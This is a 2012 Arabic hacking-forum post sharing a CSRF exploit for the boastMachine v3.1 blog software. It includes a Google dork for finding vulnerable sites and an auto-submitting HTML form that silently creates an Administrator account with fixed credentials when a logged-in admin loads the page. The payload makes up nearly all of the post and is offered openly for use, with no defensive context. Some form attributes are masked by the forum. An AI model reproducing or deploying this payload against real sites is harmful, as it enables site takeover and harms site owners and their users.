التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 03-29-2012, 01:43 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Post boastMachine v3.1 <= CSRF Add Admin Vulnerability


بسم الله الرحمن الرحيم.
السلام عليكم ورحمه الله وبركاته.

كود:
# Exploit Title:  boastMachine   v3.1   <=   CSRF  Add  Admin  Vulnerability
# Date: 28/3/2012
# Author: Dr.NaNo
# Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
# Version: 3.1
# Tested on: Linux-Red-Hat
# Google Dork: Powered by  boastMachine  v3.1
#
########################################################
#                     ~ Exploit ~                      #  
########################################################
 
<html>
<form  ****="nano" action="http://localhost/{PACH}/bmc/admin.php?action=add_user&blog" method="post">
<input type="hidden" ****="action" value="add_user"><br/>
<input type="hidden" ****="do" value="add"><br/>
<input type="hidden" value="NANO" ****="user_login"><br/>
<input type="hidden" value="NANO" ****="user_pass"><br/>
<input type="hidden" value="Administrator" ****="user_****"><br/>
<input type="hidden" value="security@wsecurity.com" ****="user_email"><br/>
<input type="hidden" value="4" ****="blogs[]"><br/>
<input type="hidden" value="4" ****="user_level"><br/>
<input type="hidden" value="Add"><br/>
</form>
******************.nano.submit();</script>
</html>
 
########################################################
#                                                      #
# ~ Greetz : Dr.WEP , JIKO , ( All FriendS ) ~          #
#                                                      #
########################################################
more




boastMachine v3>1 <= CSRF Add Admin Vulnerability

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:59 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0